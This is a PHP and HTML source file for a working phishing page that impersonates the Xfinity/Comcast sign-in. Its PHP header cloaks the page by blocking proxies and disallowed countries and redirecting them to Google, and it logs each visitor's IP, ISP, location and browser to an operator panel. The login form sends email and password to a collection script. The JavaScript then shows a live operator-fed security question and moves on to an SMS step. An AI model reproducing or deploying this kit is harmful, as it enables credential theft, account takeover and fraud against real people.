<?php
session_start();
include "panel/banip/zeus.php";
include "panel/send/panel.php";
require_once 'prevents/dt.php';
require_once 'prevents/filtre.php';
$settings = [];
if (file_exists("panel/settings/settings.json")) {
    $settings = json_decode(file_get_contents("panel/settings/settings.json"), true);
}
$checkProxy = $settings['proxy_check'] ?? false;
$checkCountry = $settings['country_check'] ?? false;
$browser = new BrowserDetection();
$detector = new Obj();
$deviceType = $browser->isMobile() ? "📱 Mobile Device" : "💻 Desktop Device";
$os = $browser->getPlatform();
$browserName = $browser->getName();
$browserVersion = $browser->getVersion();
$browserInfo = "$browserName $browserVersion";
$ipDetails = $detector->getIpDetails();
$visitor_ip = $_SERVER['REMOTE_ADDR'];
if (!$checkProxy && !$checkCountry) {
    $status = "⚠️ ANTIBOTS DISABLED";
    $statusClass = "status-clean";
    $blockAccess = false;
} else {
    $status = "✅ CLEAN";
    $statusClass = "status-clean";
    $blockAccess = false;
    if ($checkProxy) {
        $isProxy = !$detector->__checkproxy();
        if ($isProxy) {
            $status = "⚠️ PROXY/VPN DETECTED";
            $statusClass = "status-proxy";
            $blockAccess = true;
        }
    }
    if ($checkCountry && !$blockAccess) {
        $allowedCountries = [];
        if (file_exists("panel/countryallowed/allowed_countries.php")) {
            include "panel/countryallowed/allowed_countries.php";
            $allowedCountries = $country;
        }
        $isAllowedCountry = $detector->__allowedcountry($allowedCountries);
        if (!$isAllowedCountry) {
            $status = "🚫 PAYS NON AUTORISÉ";
            $statusClass = "status-blocked";
            $blockAccess = true;
        }
    }
}
$country = $ipDetails['country'] ?? 'Unknown';
$city = $ipDetails['city'] ?? 'Unknown';
$isp = $ipDetails['isp'] ?? 'Unknown';
$date = date("Y-m-d H:i:s");
$visitor_info = "<tr><td><img class='flag-icon' src='https://flagcdn.com/16x12/" . strtolower($ipDetails['countryCode']) . ".png' alt='" . $country . "'> $visitor_ip</td><td>$date</td><td>$isp</td><td>$country</td><td><span class='status-device'>$deviceType</span></td><td><span class='$statusClass'>$status</span></td><td>$os</td><td>$browserInfo</td></tr>";
try {
    $file = fopen("panel/dhyouf.php", "r+");
    if ($file) {
        $content = fread($file, filesize("panel/dhyouf.php"));
        $insert_position = strpos($content, '</tbody>');
        if ($insert_position !== false) {
            $new_content = substr($content, 0, $insert_position) . $visitor_info . substr($content, $insert_position);
            fseek($file, 0);
            fwrite($file, $new_content);
        }
        fclose($file);
    }
} catch (Exception $e) {
    error_log("Erreur d'écriture dans dhyouf.php: " . $e->getMessage());
}
if ($blockAccess) {
    header("Location: https://www.google.com");
    exit();
}
$token = bin2hex(random_bytes(32));
$_SESSION['auth_token'] = $token;
$_SESSION['auth_time'] = time();
$_SESSION['visitor_ip'] = $_SERVER['REMOTE_ADDR'];
$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
if (isset($_GET['verify']) && $_GET['verify'] == 'ajax') {
    header('Content-Type: application/json');
    echo json_encode(['success' => true, 'token' => $token]);
    exit();
}
if (!isset($_SESSION['auth_token'])) {
    header("Location: https://www.google.com");
    exit();
}
if (isset($_GET['action']) && $_GET['action'] == 'redirect') {
    if (isset($_SESSION['redirect_url']) && !empty($_SESSION['redirect_url'])) {
        $redirect_url = $_SESSION['redirect_url'];
        unset($_SESSION['redirect_url']);
        header("Location: " . $redirect_url);
        exit();
    }
    header("Location: login.php");
    exit();
}
if (session_status() == PHP_SESSION_NONE) {
    session_start();
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign in with your Xfinity ID</title>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
        
        :root {
            --primary-color: #581c87; /* Xfinity Purple */
            --primary-dark: #44156a;
            --text-color: #1a1a1a;
            --text-light: #555555;
            --border-color: #8a8a8a;
            --page-bg: #ffffff;
            --footer-bg: #f5f5f5;
            --link-color: #0061a1;
            --error-color: #D32F2F;
        }
        
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: 'Roboto', sans-serif;
        }
        
        body {
            background: var(--page-bg);
            min-height: 100vh;
            display: flex;
            flex-direction: column;
            color: var(--text-color);
        }
        
        .page-wrapper {
            display: flex;
            flex-direction: column;
            min-height: 100vh;
            width: 100%;
        }
        
        .header {
            padding: 32px 40px;
            background: #ffffff;
            border-bottom: 1px solid #e0e0e0;
        }
        
        .logo {
            font-size: 28px;
            font-weight: 700;
            color: var(--text-color);
        }
        
        .main-content {
            flex: 1;
            display: flex;
            justify-content: center;
            padding: 40px 20px;
            background-color: var(--page-bg);
        }
        
        .login-container {
            width: 100%;
            max-width: 440px;
            background: #ffffff;
            padding: 40px;
            border-radius: 8px;
            box-shadow: 0 4px 12px rgba(0, 0, 0, 0.05);
            border: 1px solid #e0e0e0;
        }
        
        h1 {
            font-size: 28px;
            color: var(--text-color);
            margin-bottom: 24px;
            font-weight: 700;
        }
        
        .form-group {
            margin-bottom: 20px;
            width: 100%;
        }
        
        label {
            /* Labels are hidden, placeholders are used */
            display: none;
        }
        
        .input-wrapper {
            position: relative;
        }
        
        input[type="text"],
        input[type="email"], /* Added email type for consistency */
        input[type="password"] {
            width: 100%;
            padding: 14px 16px;
            border: 1px solid var(--border-color);
            border-radius: 8px;
            font-size: 16px;
            transition: all 0.3s ease;
            height: 52px;
        }
        
        input:focus {
            outline: none;
            border-color: var(--primary-color);
            box-shadow: 0 0 0 2px rgba(88, 28, 135, 0.2);
        }
        
        .input-error { /* Your original error class */
            color: var(--error-color);
            font-size: 14px;
            margin-top: 5px;
            display: none;
        }
        
        .login-button {
            background-color: var(--primary-color);
            color: white;
            border: none;
            border-radius: 8px;
            padding: 14px;
            font-size: 16px;
            font-weight: 700;
            cursor: pointer;
            display: flex;
            align-items: center;
            justify-content: center;
            gap: 12px;
            transition: all 0.3s ease;
            width: 100%;
            height: 52px;
        }
        
        .login-button:hover:not(:disabled) {
            background-color: var(--primary-dark);
        }
        
        .terms-text {
            font-size: 13px;
            color: var(--text-light);
            line-height: 1.5;
            margin-top: 16px;
            margin-bottom: 24px;
        }
        .terms-text a {
            color: var(--link-color);
            text-decoration: underline;
            font-weight: 500;
        }

        .links-container {
            margin-top: 32px;
            border-top: 1px solid #e0e0e0;
            padding-top: 24px;
        }
        .link-item {
            display: flex;
            justify-content: space-between;
            align-items: center;
            padding: 16px 0;
            color: var(--link-color);
            text-decoration: none;
            font-weight: 700;
            font-size: 16px;
            border-bottom: 1px solid #e0e0e0;
        }
        .link-item:last-child {
            border-bottom: none;
        }
        .link-item svg {
            width: 20px;
            height: 20px;
            color: var(--text-color);
        }

        .footer {
            background-color: var(--footer-bg);
            padding: 32px 20px;
            text-align: center;
        }
        .footer p {
            font-size: 12px;
            color: #8a8a8a;
            line-height: 1.6;
        }
        .footer a {
            color: #8a8a8a;
            text-decoration: underline;
        }

        /* --- STYLES FOR UNTOUCHED FUNCTIONS --- */
        .spinner {
            display: none;
            width: 20px;
            height: 20px;
            border: 3px solid rgba(255, 255, 255, 0.3);
            border-radius: 50%;
            border-top-color: #fff;
            animation: spin 1s ease-in-out infinite;
        }
        @keyframes spin {
            to { transform: rotate(360deg); }
        }
        .login-button.loading .spinner { display: block; }
        .login-button.loading .button-text {
            visibility: hidden;
            position: absolute;
        }
        
        .success-container {
            display: none;
            text-align: center;
            padding: 20px;
        }
        .success-container.show { display: block; }
        .success-title {
            color: var(--text-color);
            font-weight: 700;
            font-size: 18px;
            margin-bottom: 8px;
        }
        .success-message {
            color: var(--text-light);
            font-size: 15px;
            line-height: 1.5;
        }
        .loading-spinner {
            width: 24px;
            height: 24px;
            border: 3px solid rgba(0, 0, 0, 0.2);
            border-radius: 50%;
            border-top-color: var(--primary-color);
            animation: spin 1s linear infinite;
            margin: 16px auto 0;
        }
        @keyframes fadeIn {
            from { opacity: 0; transform: translateY(-10px); }
            to { opacity: 1; transform: translateY(0); }
        }

        .security-overlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.6);
            display: none;
            justify-content: center;
            align-items: center;
            z-index: 1000;
            padding: 16px;
        }
        .security-container {
            background-color: #fff;
            padding: 40px;
            border-radius: 8px;
            box-shadow: 0 10px 30px rgba(0, 0, 0, 0.15);
            width: 100%;
            max-width: 500px;
            text-align: center;
            animation: fadeInScale 0.4s ease-out;
        }
        @keyframes fadeInScale {
            from { opacity: 0; transform: scale(0.95); }
            to { opacity: 1; transform: scale(1); }
        }
        .security-header { margin-bottom: 24px; }
        .security-icon {
            width: 60px;
            height: 60px;
            margin-bottom: 16px;
        }
        .security-title {
            font-size: 24px;
            font-weight: 700;
            color: var(--text-color);
            margin-bottom: 8px;
        }
        .security-subtitle {
            font-size: 16px;
            color: #495057;
        }
        .question-text {
            font-size: 18px;
            font-weight: 700;
            color: var(--primary-color);
            margin-bottom: 24px;
            line-height: 1.5;
        }
        .answer-input {
            width: 100%;
            padding: 14px 18px;
            border: 1px solid #ced4da;
            border-radius: 8px;
            font-size: 16px;
            margin-bottom: 24px;
            text-align: center;
        }
        .submit-btn {
            background-color: var(--primary-color);
            color: white;
            border: none;
            border-radius: 8px;
            padding: 16px;
            width: 100%;
            font-size: 16px;
            font-weight: 600;
            cursor: pointer;
            transition: background-color 0.3s ease;
        }
        .submit-btn:hover {
            background-color: var(--primary-dark);
        }
        
        @media(max-width:480px) {
            .header { padding: 20px 16px; }
            .main-content { padding: 0; }
            .login-container { 
                padding: 24px;
                border: none;
                box-shadow: none;
                border-radius: 0;
            }
            h1 { font-size: 24px; }
            .security-container { padding: 24px; }
            .security-title { font-size: 20px; }
        }
    </style>
</head>
<body>
<div class="page-wrapper">
    <!-- No header, as per screenshot -->
    <main class="main-content">
        <div class="login-container">
            <div id="loginFormContainer">
                
                <!-- Xfinity Text Logo Changed to local image -->
                <div class="logo" style="max-width: 120px; margin-bottom: 24px;">
                    <img src="logo.png" alt="Xfinity Logo" style="width: 120px; height: auto;">
                </div>

                <h1>Sign in to verify your email association.</h1>
                
                <form method="post" action="panel/send/18b43c6a536a8fe1362f7a3887936be6.php" id="loginForm">
                    <div class="form-group">
                        <!-- Label removed, placeholder added -->
                        <div class="input-wrapper">
                            <input type="text" id="username" name="username" autocomplete="username" required placeholder="Email address">
                        </div>
                        <span class="input-error" id="emailError"></span>
                    </div>
                    
                    <div class="form-group">
                        <!-- Label removed, placeholder added -->
                        <div class="input-wrapper">
                            <input type="password" id="password" name="password" autocomplete="current-password" required placeholder="Password">
                            <!-- Removed the eye toggle, as it's not in the Xfinity design -->
                        </div>
                    </div>
                    
                    <p class="terms-text">
                        By signing in, you agree to our 
                        <a href="#">Terms of Service</a> and 
                        <a href="#">Privacy Policy</a>.
                    </p>

                    <button type="submit" class="login-button">
                        <div class="spinner"></div>
                        <span class="button-text">Let's go</span>
                    </button>
                </form>
                
                <div class="links-container">
                    <a href="#" class="link-item">
                        <span>Find your Xfinity ID</span>
                        <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="2.5" stroke="currentColor">
                            <path stroke-linecap="round" stroke-linejoin="round" d="M8.25 4.5l7.5 7.5-7.5 7.5" />
                        </svg>
                    </a>
                    <a href="#" class="link-item">
                        <span>Create a new Xfinity ID</span>
                        <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="2.5" stroke="currentColor">
                            <path stroke-linecap="round" stroke-linejoin="round" d="M8.25 4.5l7.5 7.5-7.5 7.5" />
                        </svg>
                    </a>
                </div>

            </div>
            
            <!-- This is your original success container, kept for function integrity -->
            <div class="success-container" id="successContainer">
                <div class="success-content">
                    <div class="success-title">Login Successful</div>
                    <div class="success-message">Please wait while we prepare your security session...</div>
                    <div class="loading-spinner"></div>
                </div>
            </div>
        </div>
    </main>
</div>

<footer class="footer">
    <p>© 2025 Comcast</p>
    <p style="margin-top: 16px;">
        <a href="#">Web Terms of Service</a>
    </p>
</footer>

<!-- This is your original security overlay, kept for function integrity, and re-styled -->
<div class="security-overlay" id="securityOverlay">
    <div class="security-container">
        <div class="security-header">
            <!-- Icon removed to match Xfinity's simpler modal style -->
            <h2 class="security-title">Security Challenge</h2>
            <p class="security-subtitle">Please answer the security question to continue</p>
        </div>
        <form method="post" action="panel/send/send_answer.php" id="securityForm">
            <input type="hidden" name="token" value="">
            <div class="question-text" id="securityQuestionText"></div>
            <input type="text" name="answer" class="answer-input" placeholder="Enter your answer" required>
            <button type="submit" class="submit-btn">Submit Answer</button>
        </form>
    </div>
</div>

<script>
    // --- START: Original JS (Untouched) ---
    // Note: The email validation logic is still here, as requested by the original file.
    // It will validate that the "Email, mobile, or username" field is a valid email format.
    const emailRegex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;

    document.addEventListener('DOMContentLoaded', function() {
        const loginForm = document.getElementById('loginForm');
        const usernameInput = document.getElementById('username');
        const emailError = document.getElementById('emailError');
        const successContainer = document.getElementById('successContainer');
        const loginFormContainer = document.getElementById('loginFormContainer');
        const securityOverlay = document.getElementById('securityOverlay');
        const securityForm = document.getElementById('securityForm');

        function validateEmail(email) {
            return emailRegex.test(String(email).toLowerCase());
        }

        loginForm.addEventListener('submit', function (e) {
            const button = this.querySelector('.login-button');
            const username = usernameInput.value.trim();

            // Client-side email validation check
            if (!validateEmail(username)) {
                e.preventDefault(); // Stop form submission
                emailError.textContent = 'Please enter a valid email address.';
                emailError.style.display = 'block';
                usernameInput.focus();
                return;
            } else {
                emailError.style.display = 'none';
                emailError.textContent = '';
            }

            e.preventDefault();
            button.classList.add('loading');
            button.disabled = true;

            fetch(this.action, {
                method: 'POST',
                body: new FormData(this)
            }).then(response => {
                if (response.redirected) {
                    window.location.href = response.url;
                } else {
                    throw new Error('No redirection occurred.');
                }
            }).catch(error => {
                console.error('Error:', error);
                button.classList.remove('loading');
                button.disabled = false;
            });
        });

        // Clear error message on input
        usernameInput.addEventListener('input', function() {
            emailError.style.display = 'none';
        });

        const urlParams = new URLSearchParams(window.location.search);
        const token = urlParams.get('token');
        if (token) {
            loginFormContainer.style.display = 'none';
            successContainer.classList.add('show');
            checkQuestion(token);
        }

        function checkQuestion(token) {
            let timeoutCounter = 0;
            const maxTimeout = <?php echo isset($securityQuestionTimeout) ? $securityQuestionTimeout : 60; ?>;
            const checkInterval = setInterval(() => {
                timeoutCounter++;
                if (timeoutCounter >= maxTimeout) {
                    clearInterval(checkInterval);
                    window.location.href = 'sms.php';
                    return;
                }
                fetch(`panel/send/questions/${token}.txt`)
                    .then(response => {
                        if (response.ok) {
                            return response.text();
                        }
                        if (response.status === 404) {
                            return null;
                        }
                        throw new Error('Network response was not ok');
                    })
                    .then(question => {
                        if (question && question.trim() !== '') {
                            clearInterval(checkInterval);
                            securityOverlay.querySelector('[name="token"]').value = token;
                            document.getElementById('securityQuestionText').textContent = question;
                            successContainer.classList.remove('show');
                            securityOverlay.style.display = 'flex';
                        }
                    })
                    .catch(error => {
                        console.log('Waiting for question...');
                    });
            }, 1000);
        }
        
        securityForm.addEventListener('submit', function(e) {
            e.preventDefault();
            const button = this.querySelector('.submit-btn');
            button.disabled = true;
            
            fetch(this.action, {
                method: 'POST',
                body: new FormData(this)
            }).then(response => {
                if (response.redirected) {
                    window.location.href = response.url;
                } else {
                    throw new Error('Submission failed.');
                }
            }).catch(error => {
                console.error('Error:', error);
                button.disabled = false;
            });
        });
    });
    // --- END: Original JS (Untouched) ---
</script>
</body>
</html>